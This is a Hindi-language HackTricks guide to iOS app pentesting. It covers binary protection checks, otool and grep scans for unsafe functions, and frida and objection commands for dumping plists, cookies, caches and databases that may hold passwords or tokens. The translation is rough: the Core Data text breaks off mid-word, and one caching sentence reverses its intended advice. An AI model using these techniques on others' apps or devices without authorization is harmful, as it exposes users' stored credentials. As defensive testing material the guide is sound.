hacktricks/mobile-pentesting/ios-pentesting/README.md

113 KiB

iOS पेंटेस्टिंग


Trickest का उपयोग करें और दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित वर्कफ़्लो को आसानी से बनाएं और स्वचालित करें।
आज ही पहुंचें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

iOS मूलभूत

{% content-ref url="ios-basics.md" %} ios-basics.md {% endcontent-ref %}

परीक्षण पर्यावरण

इस पृष्ठ पर आप iOS सिम्युलेटर, एम्युलेटर और जेलब्रेकिंग के बारे में जानकारी पा सकते हैं:

{% content-ref url="ios-testing-environment.md" %} ios-testing-environment.md {% endcontent-ref %}

प्रारंभिक विश्लेषण

मूल iOS परीक्षण कार्य

परीक्षण के दौरान कई कार्रवाई सुझाई जाएंगी (डिवाइस से कनेक्ट करें, फ़ाइलें पढ़ें/लिखें/अपलोड/डाउनलोड करें, कुछ उपकरणों का उपयोग करें...). इसलिए, यदि आप इनमें से किसी कार्रवाई को कैसे करें इसका पता नहीं है तो, पृष्ठ पढ़ना शुरू करें:

{% content-ref url="basic-ios-testing-operations.md" %} basic-ios-testing-operations.md {% endcontent-ref %}

{% hint style="info" %} निम्नलिखित चरणों के लिए ऐप्लिकेशन को स्थापित किया जाना चाहिए और ऐप्लिकेशन की IPA फ़ाइल पहले ही प्राप्त कर लेनी चाहिए।
इसे कैसे करना है इसके लिए Basic iOS Testing Operations पृष्ठ पढ़ें। {% endhint %}

मूल स्थिर विश्लेषण

MobSF टूल का उपयोग करना सुझावित है ताकि IPA फ़ाइल पर स्वचालित स्थिर विश्लेषण किया जा सके।

बाइनरी में मौजूद सुरक्षा उपायों की पहचान:

  • PIE (स्थिर स्थान निर्धारित): जब सक्षम किया जाता है, ऐप्लिकेशन हर बार एक यादृच्छिक मेमोरी पते में लोड होता है, जिससे इसका प्रारंभिक मेमोरी पता पूर्वानुमान करना कठिन हो जाता है।
otool -hv <app-binary> | grep PIE   # इसमें PIE ध्वज शामिल होना चाहिए
  • स्टैक कैनेरीज: स्टैक की अखंडता को सत्यापित करने के लिए, किसी फ़ंक्शन को बुलाने से पहले स्टैक पर 'कैनेरी' मानक रखा जाता है और फ़ंक्शन समाप्त होने पर फिर से सत्यापित किया जाता है।
otool -I -v <app-binary> | grep stack_chk   # इसमें stack_chk_guard और stack_chk_fail प्रतीक शामिल होना चाहिए
  • ARC (स्वचालित संदर्भ गणना): सामान्य मेमोरी कोरप्शन दोषों को रोकने के लिए
otool -I -v <app-binary> | grep objc_release   # इसमें _objc_release प्रतीक शामिल होना चाहिए
  • एन्क्रिप्टेड बाइनरी: बाइनरी को एन्क्रिप्ट किया जाना चाहिए
otool -arch all -Vl <app-binary> | grep -A5 LC_ENCRYPT   # cryptid 1 होना चाहिए

संवेदनशील/असुरक्षित फ़ंक्शनों की पहचान

  • कमजोर हैशिंग एल्गोरिदम
# iOS डिवाइस पर
otool -Iv <app> | grep -w "_CC_MD5"
otool -Iv <app> | grep -w "_CC_SHA1"

# लिनक्स पर
grep -iER "_CC_MD5"
grep -iER "_CC_SHA1"
  • असुरक्षित रैंडम फ़ंक्शन्स
# iOS डिवाइस पर
otool -Iv <app> | grep -w "_random"
otool -Iv <app> | grep -w "_srand"
otool -Iv <app> | grep -w "_rand"

# लिनक्स पर
grep -iER "_random"
grep -iER "_srand"
grep -iER "_rand"
  • असुरक्षित ‘मैलोक’ फ़ंक्शन
# iOS डिवाइस पर
otool -Iv <app> | grep -w "_malloc"

# लिनक्स पर
grep -iER "_malloc"
  • असुरक्षित और वंलरेबल फ़ंक्शन्स
# iOS डिवाइस पर
otool -Iv <app> | grep -w "_gets"
otool -Iv <app> | grep -w "_memcpy"
otool -Iv <app> | grep -w "_strncpy"
otool -Iv <app> | grep -w "_strlen"
otool -Iv <app> | grep -w "_vsnprintf"
otool -Iv <app> | grep -w "_sscanf"
otool -Iv <app> | grep -w "_strtok"
otool -Iv <app> | grep -w "_alloca"
otool -Iv <app> | grep -w "_sprintf"
otool -Iv <app> | grep -w "_printf"
otool -Iv <app> | grep -w "_vsprintf"

# लिनक्स पर
grep -R "_gets"
grep -iER "_memcpy"
grep -iER "_strncpy"
grep -iER "_strlen"
grep -iER "_vsnprintf"
grep -iER "_sscanf"
grep -iER "_strtok"
grep -iER "_alloca"
grep -iER "_sprintf"
grep -iER "_printf"
grep -iER "_vsprintf"

मूल गतिशील विश्लेषण

MobSF द्वारा किए गए गतिशील विश्लेषण की जाँच करें। आपको विभिन्न दृश्यों में नेविगेट करने और उनसे बातचीत करने की आवश्यकता होगी, लेकिन यह कई कक्षाओं को हुक करेगा और अन्य कार्रवाई करेगा और जब आप समाप्त हो जाएंगे तो एक रिपोर्ट तैयार करेगा।

स्थापित ऐप्स की सूची

बंडल पहचानकर्ता की पहचान करने के लिए आदेश frida-ps -Uai का उपयोग करें:

$ frida-ps -Uai
PID  Name                 Identifier
----  -------------------  -----------------------------------------
6847  Calendar             com.apple.mobilecal
6815  Mail                 com.apple.mobilemail
-  App Store            com.apple.AppStore
-  Apple Store          com.apple.store.Jolly
-  Calculator           com.apple.calculator
-  Camera               com.apple.camera
-  iGoat-Swift          OWASP.iGoat-Swift

मूल्यांकन और हुकिंग

सीखें कैसे एप्लिकेशन के घटकों का मूल्यांकन करें और कैसे आसानी से विधियों और वर्गों को हुक करें objection के साथ:

{% content-ref url="ios-hooking-with-objection.md" %} ios-hooking-with-objection.md {% endcontent-ref %}

IPA संरचना

IPA फ़ाइल की संरचना मुख्य रूप से एक ज़िप पैकेज की तरह है। इसके एक्सटेंशन को .zip में बदलकर, इसे डीकंप्रेस किया जा सकता है ताकि इसकी सामग्री प्रकट हो। इस संरचना में, एक बंडल एक पूरी तरह से पैकेज किया गया एप्लिकेशन को प्रस्तुत करने के लिए होता है। इसके अंदर, आपको <नाम>.app नामक एक निर्देशिका मिलेगी, जो एप्लिकेशन के संसाधनों को संक्षेपित करती है।

  • Info.plist: यह फ़ाइल एप्लिकेशन की विशेष विन्यास विवरणों को धारण करती है।
  • _CodeSignature/: यह निर्देशिका एक प्लिस्ट फ़ाइल शामिल करता है जो एक हस्ताक्षर को धारित करती है, जो बंडल में सभी फ़ाइलों की अखंडता सुनिश्चित करता है।
  • Assets.car: एक संकुचित आर्काइव जो आइकन जैसी संपत्ति फ़ाइलों को संग्रहित करता है।
  • Frameworks/: यह फ़ोल्डर एप्लिकेशन की मूल पुस्तकालयों को संभालता है, जो .dylib या .framework फ़ाइलों के रूप में हो सकती हैं।
  • PlugIns/: इसमें एप्लिकेशन के विस्तार को शामिल करने वाले एक्सटेंशन शामिल हो सकते हैं, जिन्हें .appex फ़ाइलें कहा जाता है, हालांकि वे हमेशा मौजूद नहीं होते हैं। * Core Data: इसका उपयोग आपके एप्लिकेशन के स्थायी डेटा को ऑफ़लाइन उपयोग के लिए सहेजने, अस्थायी डेटा कैश करने और एकल उपकरण पर आपके ऐप में अनडू कार्यक्षमता जोड़ने के लिए किया जाता है। एक आईक्लाउड खाते में कई उपकरणों के बीच डेटा सिंक करने के लिए, कोर डेटा स्वचालित रूप से आपके स्कीमा को एक CloudKit कंटेनर में परिलक्षित करता है।
  • PkgInfo: PkgInfo फ़ाइल आपके एप्लिकेशन या बंडल के प्रकार और निर्माता कोड को निर्दिष्ट करने का एक वैकल्पिक तरीका है।
  • en.lproj, fr.proj, Base.lproj: वे भाषा पैक हैं जो उन विशेष भाषाओं के लिए संसाधनों को शामिल करते हैं, और एक डिफ़ॉल्ट संसाधन जो उस भाषा का समर्थन नहीं करता है।
  • सुरक्षा: _CodeSignature/ निर्देशिका एप्लिकेशन की सुरक्षा में महत्वपूर्ण भूमिका निभाती है जिसके माध्यम से डिजिटल हस्ताक्षरों के माध्यम से सभी बंडल फ़ाइलों की अखंडता की पुष्टि करती है।
  • संपत्ति प्रबंधन: Assets.car फ़ाइल संपत्तियों को प्रबंधित करने के लिए संकुचितीकरण का उपयोग करती है, जो एप्लिकेशन प्रदर्शन को अनुकूलित करने और इसका कुल आकार कम करने के लिए महत्वपूर्ण है।
  • फ्रेमवर्क और प्लगइंस: ये निर्देशिकाएं iOS एप्लिकेशनों की मॉड्यूलरिटी को अंगीकार करती हैं, जो डेवलपर्स को पुन: उपयोगी कोड पुस्तकालयें (Frameworks/) शामिल करने और ऐप कार्यक्षमता को विस्तारित करने की अनुमति देती हैं (PlugIns/।)
  • स्थानीयकरण: यह संरचना विशेष भाषा पैक के लिए संसाधनों को शामिल करके कई भाषाओं का समर्थन करती है, जिससे विश्वस्तरीय एप्लिकेशन तक पहुंचने में सहायक होती है।

Info.plist

Info.plist iOS एप्लिकेशनों के लिए एक मूलभूत स्तंभ के रूप में काम करता है, कुंजी-मूल्य जोड़ों के रूप में महत्वपूर्ण विन्यास डेटा को संकुचित करता है। यह फ़ाइल केवल एप्लिकेशनों के लिए ही अनिवार्य है बल्कि उसमें शामिल किए गए एप्लिकेशन एक्सटेंशन और फ़्रेमवर्क्स के लिए भी। यह XML या एक बाइनरी फ़ॉर्मेट में संरचित होता है और एप्लिकेशन अनुमतियों से लेकर सुरक्षा विन्यास तक विभिन्न महत्वपूर्ण जानकारी धारण करता है। उपलब्ध कुंजियों की विस्तृत अन्वेषण के लिए, व्यक्ति एप्पल डेवलपर डॉक्यूमेंटेशन का संदर्भ ले सकते हैं।

उन लोगों के लिए जो इस फ़ाइल के साथ काम करना चाहते हैं एक अधिक पहुंचने योग्य फ़ॉर्मेट में, XML परिवर्तन को plutil का उपयोग करके मैकओएस पर आसानी से प्राप्त किया जा सकता है (10.2 और बाद के संस्करणों पर स्वत: उपलब्ध) या लिनक्स पर plistutil का उपयोग करके। परिवर्तन के लिए निम्नलिखित कमांड हैं:

  • मैकओएस के लिए:
$ plutil -convert xml1 Info.plist
  • लिनक्स के लिए:
$ apt install libplist-utils
$ plistutil -i Info.plist -o Info_xml.plist

महाज़ सूचना के बीच, Info.plist फ़ाइल द्वारा जानकारी दी जा सकती है, जैसे ऍप परमिशन स्ट्रिंग (UsageDescription), कस्टम URL स्कीम (CFBundleURLTypes), और App Transport Security के लिए कॉन्फ़िगरेशन (NSAppTransportSecurity)। इन एंट्रीज़ के साथ, निर्यात/आयात किए गए कस्टम डॉक्यूमेंट टाइप्स (UTExportedTypeDeclarations / UTImportedTypeDeclarations) जैसे अन्य एंट्रीज़ को आसानी से फ़ाइल की जांच करके या एक सरल grep कमांड का उपयोग करके ढूंढा जा सकता है:

$ grep -i <keyword> Info.plist

डेटा पथ

iOS माहौल में, निर्दिष्ट किए गए निर्देशिकाएँ सिस्टम एप्लिकेशन और उपयोगकर्ता इंस्टॉल की गई एप्लिकेशनों के लिए हैं। सिस्टम एप्लिकेशन /Applications निर्देशिका में निवास करते हैं, जबकि उपयोगकर्ता इंस्टॉल की गई एप्लिकेशनें /private/var/containers/ के नीचे रखी जाती हैं। इन एप्लिकेशनों को एक अद्वितीय पहचानकर्ता दिया जाता है जिसे 128-बिट UUID कहा जाता है, जिसके कारण एक एप्लिकेशन के फ़ोल्डर को मैन्युअल रूप से खोजना कठिन हो सकता है क्योंकि निर्देशिका नामों की अनियमितता होती है।

एक उपयोगकर्ता इंस्टॉल की गई एप्लिकेशन के स्थापना निर्देशिका का खोज आसान बनाने के लिए, objection टूल एक उपयोगी कमांड, env प्रदान करता है। यह कमांड सवाल में एप्लिकेशन के लिए विस्तृत निर्देशिका जानकारी प्रकट करती है। नीचे इस कमांड का उपयोग करने का एक उदाहरण है:

OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # env

Name               Path
-----------------  -------------------------------------------------------------------------------------------
BundlePath         /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app
CachesDirectory    /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library/Caches
DocumentDirectory  /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Documents
LibraryDirectory   /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library

विकल्प से, ऐप नाम को find कमांड का उपयोग करके /private/var/containers में खोजा जा सकता है:

find /private/var/containers -name "Progname*"

Commands जैसे ps और lsof का उपयोग करके एप्लिकेशन की प्रक्रिया की पहचान करने और खुली फ़ाइलों की सूची बनाने के लिए भी किया जा सकता है, जो एप्लिकेशन के सक्रिय निर्देशिका मार्गों में अंदरूनी दृश्य प्रदान करता है:

ps -ef | grep -i <app-name>
lsof -p <pid> | grep -i "/containers" | head -n 1

बंडल निर्देशिका:

  • AppName.app
  • यह एप्लिकेशन बंडल है जैसा IPA में पहले देखा गया था, इसमें महत्वपूर्ण एप्लिकेशन डेटा, स्थिर सामग्री और एप्लिकेशन का कंपाइल किया गया बाइनरी शामिल है।
  • इस निर्देशिका को उपयोगकर्ताओं को दिखाई देता है, लेकिन उपयोगकर्ता इसे लिखने में सक्षम नहीं हैं
  • इस निर्देशिका में सामग्री बैकअप नहीं होती है।
  • इस फ़ोल्डर की सामग्री का उपयोग कोड हस्ताक्षर को सत्यापित करने के लिए किया जाता है।

डेटा निर्देशिका:

  • Documents/
  • सभी उपयोगकर्ता द्वारा उत्पन्न डेटा शामिल है। एप्लिकेशन अंत उपयोगकर्ता इस डेटा का निर्माण प्रारंभ करता है।
  • उपयोगकर्ताओं को दिखाई देता है और उपयोगकर्ता इसे लिख सकते हैं
  • इस निर्देशिका में सामग्री बैकअप होती है
  • एप्लिकेशन NSURLIsExcludedFromBackupKey सेट करके पथों को अक्षम कर सकता है।
  • Library/
  • उन सभी फ़ाइलें शामिल हैं जो उपयोगकर्ता-विशिष्ट नहीं हैं, जैसे कैश, पसंद, कुकीज़, और प्रॉपर्टी सूची (plist) कॉन्फ़िगरेशन फ़ाइलें।
  • iOS एप्लिकेशन आम तौर पर Application Support और Caches उपनिर्देशिकाओं का उपयोग करते हैं, लेकिन एप्लिकेशन कस्टम उपनिर्देशिकाएं बना सकता है।
  • Library/Caches/
  • अर्ध-स्थायी कैश फ़ाइलें शामिल हैं।
  • उपयोगकर्ताओं को दिखाई नहीं देता है और उपयोगकर्ता इसे लिखने में सक्षम नहीं हैं
  • इस निर्देशिका में सामग्री बैकअप नहीं होती है।
  • जब एप्लिकेशन नहीं चल रहा हो और स्टोरेज स्थान कम हो रहा हो, तो ऑपरेटिंग सिस्टम यह निर्देशिका की फ़ाइलें स्वचालित रूप से हटा सकता है।
  • Library/Application Support/
  • एप्लिकेशन चलाने के लिए आवश्यक स्थायी फ़ाइलें शामिल हैं।
  • उपयोगकर्ताओं के लिए अदृश्य है और उपयोगकर्ता इसे लिखने में सक्षम नहीं हैं।
  • इस निर्देशिका में सामग्री बैकअप होती है
  • एप्लिकेशन NSURLIsExcludedFromBackupKey सेट करके पथों को अक्षम कर सकता है।
  • Library/Preferences/
  • एप्लिकेशन को फिर से शुरू करने के बाद भी स्थिर रह सकने वाली गुणधर्म सहेजने के लिए उपयोग किया जाता है।
  • जानकारी, एप्लिकेशन सैंडबॉक्स में एक plist फ़ाइल में अब तक अनएन्क्रिप्टेड रूप में सहेजी जाती है जिसे [BUNDLE_ID].plist कहा जाता है।
  • NSUserDefaults का उपयोग करके सहेजे गए सभी कुंजी/मान जोड़े इस फ़ाइल में पाए जा सकते हैं।
  • tmp/
  • इस निर्देशिका का उपयोग करें अस्थायी फ़ाइलें लिखने के लिए जो एप्लिकेशन लॉन्च के बीच स्थायी नहीं होने की आवश्यकता है।
  • अस्थायी कैश फ़ाइलें शामिल हैं।
  • उपयोगकर्ताओं को अदृश्य है।
  • इस निर्देशिका में सामग्री बैकअप नहीं होती है।
  • जब एप्लिकेशन नहीं चल रहा हो और स्टोरेज स्थान कम हो रहा हो, तो ऑपरेटिंग सिस्टम यह निर्देशिका की फ़ाइलें स्वचालित रूप से हटा सकता है।

चलो iGoat-Swift की एप्लिकेशन बंडल (.app) निर्देशिका को और नजदीक से देखते हैं (/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app):

OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls
NSFileType      Perms  NSFileProtection    ...  Name
------------  -------  ------------------  ...  --------------------------------------
Regular           420  None                ...  rutger.html
Regular           420  None                ...  mansi.html
Regular           420  None                ...  splash.html
Regular           420  None                ...  about.html

Regular           420  None                ...  LICENSE.txt
Regular           420  None                ...  Sentinel.txt
Regular           420  None                ...  README.txt

बाइनरी रिवर्सिंग

<application-name>.app फ़ोल्डर के अंदर आपको <application-name> नाम का एक बाइनरी फ़ाइल मिलेगी। यह फ़ाइल वह फ़ाइल है जो क्रियान्वित की जाएगी। आप otool उपकरण के साथ बाइनरी का मूल्यांकन कर सकते हैं:

otool -Vh DVIA-v2 #Check some compilation attributes
magic  cputype cpusubtype  caps    filetype ncmds sizeofcmds      flags
MH_MAGIC_64    ARM64        ALL  0x00     EXECUTE    65       7112   NOUNDEFS DYLDLINK TWOLEVEL WEAK_DEFINES BINDS_TO_WEAK PIE

otool -L DVIA-v2 #Get third party libraries
DVIA-v2:
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 400.9.1)
/usr/lib/libsqlite3.dylib (compatibility version 9.0.0, current version 274.6.0)
/usr/lib/libz.1.dylib (compatibility version 1.0.0, current version 1.2.11)
@rpath/Bolts.framework/Bolts (compatibility version 1.0.0, current version 1.0.0)
[...]

जांचें कि ऐप एन्क्रिप्टेड है

निम्नलिखित के लिए कोई आउटपुट है कि क्या है:

otool -l <app-binary> | grep -A 4 LC_ENCRYPTION_INFO

बाइनरी को विसेकट करना

टेक्स्ट सेक्शन को विसेकट करें:

otool -tV DVIA-v2
DVIA-v2:
(__TEXT,__text) section
+[DDLog initialize]:
0000000100004ab8    sub    sp, sp, #0x60
0000000100004abc    stp    x29, x30, [sp, #0x50]   ; Latency: 6
0000000100004ac0    add    x29, sp, #0x50
0000000100004ac4    sub    x8, x29, #0x10
0000000100004ac8    mov    x9, #0x0
0000000100004acc    adrp    x10, 1098 ; 0x10044e000
0000000100004ad0    add    x10, x10, #0x268

उदाहरण एप्लिकेशन के Objective-C सेगमेंट को प्रिंट करने के लिए निम्नलिखित का उपयोग किया जा सकता है:

otool -oV DVIA-v2
DVIA-v2:
Contents of (__DATA,__objc_classlist) section
00000001003dd5b8 0x1004423d0 _OBJC_CLASS_$_DDLog
isa        0x1004423a8 _OBJC_METACLASS_$_DDLog
superclass 0x0 _OBJC_CLASS_$_NSObject
cache      0x0 __objc_empty_cache
vtable     0x0
data       0x1003de748
flags          0x80
instanceStart  8

एक और संक्षिप्त Objective-C कोड प्राप्त करने के लिए आप class-dump का उपयोग कर सकते हैं:

class-dump some-app
//
//     Generated by class-dump 3.5 (64 bit).
//
//     class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//

#pragma mark Named Structures

struct CGPoint {
double _field1;
double _field2;
};

struct CGRect {
struct CGPoint _field1;
struct CGSize _field2;
};

struct CGSize {
double _field1;
double _field2;
};

हालांकि, बाइनरी को डिसएसेंबल करने के लिए सबसे अच्छे विकल्प हैं: Hopper और IDA.


Trickest का उपयोग करें ताकि आप आसानी से ऑटोमेट वर्कफ़्लो बना सकें जो दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित हो।
आज ही पहुंचें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

डेटा स्टोरेज

यह जानने के लिए कि iOS डिवाइस में डेटा कैसे स्टोर करता है, इस पेज को पढ़ें:

{% content-ref url="ios-basics.md" %} ios-basics.md {% endcontent-ref %}

{% hint style="warning" %} जानकारी स्टोर करने के निम्नलिखित स्थान को एप्लिकेशन इंस्टॉल करने के बाद, एप्लिकेशन की सभी कार्यक्षमताएं जांचने के बाद और एक उपयोगकर्ता से लॉगआउट करके एक अलग उपयोगकर्ता में लॉगइन करने के बाद जांचना चाहिए।
उद्देश्य है कि एप्लिकेशन की संवेदनशील जानकारी (पासवर्ड, टोकन), वर्तमान उपयोगकर्ता और पहले लॉग इन किए गए उपयोगकर्ताओं की खोज की जाए। {% endhint %}

Plist

plist फ़ाइलें संरचित XML फ़ाइलें हैं जो कुंजी-मानक जोड़े रखती हैं। यह स्थायी डेटा स्टोर करने का एक तरीका है, इसलिए कभी-कभी आपको इन फ़ाइलों में संवेदनशील जानकारी मिल सकती है। यह सिफारिश की जाती है कि इन फ़ाइलों की जांच करें एप्लिकेशन को इंस्टॉल करने के बाद और इसे अधिक प्रयोग करने के बाद देखें कि क्या नए डेटा लिखा गया है।

प्लिस्ट फ़ाइलों में डेटा को स्थायी रूप से स्टोर करने का सबसे सामान्य तरीका NSUserDefaults का उपयोग करना है। यह प्लिस्ट फ़ाइल एप्लिकेशन सैंडबॉक्स के अंदर Library/Preferences/<appBundleID>.plist में सहेजी जाती है।

NSUserDefaults कक्षा डिफ़ॉल्ट सिस्टम के साथ बातचीत करने के लिए एक कार्यक्रमात्मक इंटरफ़ेस प्रदान करती है। डिफ़ॉल्ट सिस्टम एक एप्लिकेशन को अपने व्यवहार को उपयोगकर्ता पसंदों के अनुसार समायोजित करने की अनुमति देता है। NSUserDefaults द्वारा सहेजे गए डेटा को एप्लिकेशन बंडल में देखा जा सकता है। यह कक्षा प्लिस्ट फ़ाइल में डेटा को स्टोर करती है, लेकिन इसे छोटी मात्रा में डेटा के साथ उपयोग करने के लिए बनाया गया है।

इस डेटा को सीधे एक विश्वसनीय कंप्यूटर के माध्यम से अब नहीं एक्सेस किया जा सकता है, लेकिन एक बैकअप करके इसे एक्सेस किया जा सकता है।

आप NSUserDefaults का उपयोग करके सहेजे गए जानकारी को डंप कर सकते हैं जिसका उपयोग objection के ios nsuserdefaults get करके किया जा सकता ह।

एप्लिकेशन द्वारा उपयोग किए जाने वाले सभी प्लिस्ट को खोजने के लिए आप /private/var/mobile/Containers/Data/Application/{APPID} तक पहुंच सकते हैं और निम्नलिखित को चला सकते हैं:

find ./ -name "*.plist"

फ़ाइलों को XML या बाइनरी (bplist) प्रारूप से XML में परिवर्तित करने के लिए, आपके ऑपरेटिंग सिस्टम पर निर्भर करता है कि विभिन्न विधियाँ उपलब्ध हैं:

मैकओएस उपयोगकर्ताओं के लिए: plutil कमांड का उपयोग करें। यह एक बिल्ट-इन उपकरण है मैकओएस (10.2+) में, जो इस उद्देश्य के लिए डिज़ाइन किया गया है:

$ plutil -convert xml1 Info.plist

लिनक्स उपयोगकर्ताओं के लिए: सबसे पहले libplist-utils इंस्टॉल करें, फिर अपनी फ़ाइल को कनवर्ट करने के लिए plistutil का उपयोग करें:

$ apt install libplist-utils
$ plistutil -i Info.plist -o Info_xml.plist

एक आपत्ति सत्र के भीतर: मोबाइल एप्लिकेशन का विश्लेषण करने के लिए, एक विशिष्ट कमांड आपको plist फ़ाइलों को सीधे कनवर्ट करने की अनुमति देता है:

ios plist cat /private/var/mobile/Containers/Data/Application/<Application-UUID>/Library/Preferences/com.some.package.app.plist

Core Data

कोर डेटा एक फ़्रेमवर्क है जो आपके एप्लिकेशन में ऑब्ज

-(void)storeDetails {
AppDelegate * appDelegate = (AppDelegate *)(UIApplication.sharedApplication.delegate);

NSManagedObjectContext *context =[appDelegate managedObjectContext];

User *user = [self fetchUser];
if (user) {
return;
}
user = [NSEntityDescription insertNewObjectForEntityForName:@"User"
inManagedObjectContext:context];
user.email = CoreDataEmail;
user.password = CoreDataPassword;
NSError *error;
if (![context save:&error]) {
NSLog(@"Error in saving data: %@", [error localizedDescription]);

}else{
NSLog(@"data stored in core data");
}
}

{% endcode %}

YapDatabase

YapDatabase एक SQLite के ऊपर बनाया गया key/value store है।
याप डेटाबेसेस SQLite डेटाबेसेस होते हैं, इसलिए आप उन्हें पिछले खंड में उपयुक्त आदेश का उपयोग करके खोज सकते हैं।

अन्य SQLite डेटाबेसेस

एप्लिकेशन्स के लिए अपना खुद का SQLite डेटाबेस बनाना सामान्य है। वे उन पर संवेदनशील डेटा स्टोर कर सकते हैं और उसे अन एन्क्रिप्टेड छोड़ सकते हैं। इसलिए, हमेशा हर डेटाबेस की जांच करना दिलचस्प होता है जो एप्लिकेशन निर्देशिका में है। इसलिए, जाएं एप्लिकेशन निर्देशिका पर जहां डेटा सहेजा गया है (/private/var/mobile/Containers/Data/Application/{APPID})

find ./ -name "*.sqlite" -or -name "*.db"

Firebase Real-Time Databases

डेवलपर्स को Firebase Real-Time Databases के माध्यम से डेटा स्टोर और सिंक करने की सुविधा प्राप्त है जो कि एक NoSQL क्लाउड-होस्टेड डेटाबेस में होती है। JSON प्रारूप में स्टोर किया जाने वाला डेटा सभी कनेक्टेड क्लाइंट्स को वास्तविक समय में सिंक्रोनाइज़ कर दिया जाता है।

यहाँ देख सकते हैं कि कैसे मिसकॉन्फ़िगर किए गए Firebase डेटाबेस की जाँच करें:

{% content-ref url="../../network-services-pentesting/pentesting-web/buckets/firebase-database.md" %} firebase-database.md {% endcontent-ref %}

Realm databases

Realm Objective-C और Realm Swift डेटा स्टोरेज के लिए एक शक्तिशाली विकल्प प्रदान करते हैं, जो Apple द्वारा प्रदान नहीं किया जाता। डिफ़ॉल्ट रूप से, ये डेटा अनएन्क्रिप्टेड स्टोर करते हैं, जिसमें एन्क्रिप्शन विशेष विन्यास के माध्यम से उपलब्ध है।

डेटाबेस स्थित हैं: /private/var/mobile/Containers/Data/Application/{APPID}। इन फ़ाइलों की जाँच करने के लिए, व्यक्ति इस्तेमाल कर सकता हैं:

iPhone:/private/var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Documents root# ls
default.realm  default.realm.lock  default.realm.management/  default.realm.note|

$ find ./ -name "*.realm*"

इन डेटाबेस फ़ाइल्स को देखने के लिए, Realm Studio टूल की सिफारिश की जाती है।

एक Realm डेटाबेस के अंदर एन्क्रिप्शन को लागू करने के लिए, निम्नलिखित कोड स्निपेट का उपयोग किया जा सकता है:

// Open the encrypted Realm file where getKey() is a method to obtain a key from the Keychain or a server
let config = Realm.Configuration(encryptionKey: getKey())
do {
let realm = try Realm(configuration: config)
// Use the Realm as normal
} catch let error as NSError {
// If the encryption key is wrong, `error` will say that it's an invalid database
fatalError("Error opening realm: \(error)")
}

Couchbase Lite डेटाबेस

Couchbase Lite को हल्का और एम्बेडेड डेटाबेस इंजन के रूप में वर्णित किया गया है जो डॉक्यूमेंट-ओरिएंटेड (NoSQL) दृष्टिकोण का पालन करता है। iOS और macOS के लिए मूल रूप से डिज़ाइन किया गया, यह डेटा को सिंक करने की क्षमता प्रदान करता है।

उपकरण पर संभावित Couchbase डेटाबेस की पहचान करने के लिए, निम्नलिखित निर्देशिका की जांच की जानी चाहिए:

ls /private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support/

कुकीज़

iOS एप्स की कुकीज़ को हर एप्स फ़ोल्डर में Library/Cookies/cookies.binarycookies में स्टोर करता है। हालांकि, डेवलपर कभी-कभी इन्हें कीचेन में सेव करने का निर्णय लेते हैं क्योंकि उल्लिखित कुकी फ़ाइल बैकअप में एक्सेस किया जा सकता है

कुकीज़ फ़ाइल की जांच के लिए आप इस पायथन स्क्रिप्ट का उपयोग कर सकते हैं या objection का ios cookies get उपयोग कर सकते हैं।
आप objection का उपयोग करके इन फ़ाइलों को जेएसओएन प्रारूप में परिवर्तित कर सकते हैं और डेटा की जांच कर सकते हैं।

...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json
[
{
"domain": "highaltitudehacks.com",
"expiresDate": "2051-09-15 07:46:43 +0000",
"isHTTPOnly": "false",
"isSecure": "false",
"name": "username",
"path": "/",
"value": "admin123",
"version": "0"
}
]

कैश

डिफ़ॉल्ट रूप से NSURLSession डेटाबेस में कैश डीबी में HTTP अनुरोध और प्रतिक्रियाएँ जैसे डेटा स्टोर करता है। यह डेटाबेस संवेदनशील डेटा भी शामिल कर सकता है, यदि टोकन, उपयोगकर्ता नाम या कोई अन्य संवेदनशील जानकारी कैश में है। कैश जानकारी खोजने के लिए ऐप के डेटा निर्देशिका (/var/mobile/Containers/Data/Application/<UUID>) खोलें और /Library/Caches/<बंडल पहचानकर्ता> पर जाएं। WebKit कैश भी कैश डीबी फ़ाइल में स्टोर किया जा रहा है। Objection कमांड sqlite connect Cache.db के साथ डेटाबेस को खोलकर इंटरैक्ट कर सकता है, क्योंकि यह एक सामान्य SQLite डेटाबेस है।

इस डेटा को कैश करने की सिफारिश की जाती है, क्योंकि इसमें अनुरोध या प्रतिक्रिया में संवेदनशील जानकारी हो सकती है। निम्नलिखित सूची नीचे विभिन्न तरीकों को प्राप्त करने के लिए दिखाती है:

  1. लॉगआउट के बाद कैश की गई प्रतिक्रियाएँ हटाना सिफारिश किया जाता है। इसे Apple द्वारा प्रदान की गई विधि के साथ किया जा सकता है removeAllCachedResponses आप इस विधि को निम्नलिखित रूप में कॉल कर सकते हैं:

URLCache.shared.removeAllCachedResponses()

यह विधि सभी कैश किए गए अनुरोधों और प्रतिक्रियाओं को कैश डीबी फ़ाइल से हटा देगी। 2. यदि कुकीज़ का लाभ उठाने की आवश्यकता नहीं है तो URLSession की .ephemeral विन्यास संपत्ति का उपयोग करना सिफारिश किया जाएगा, जो कुकीज़ और कैश सहेजने को अक्षम कर देगा।

Apple documentation:

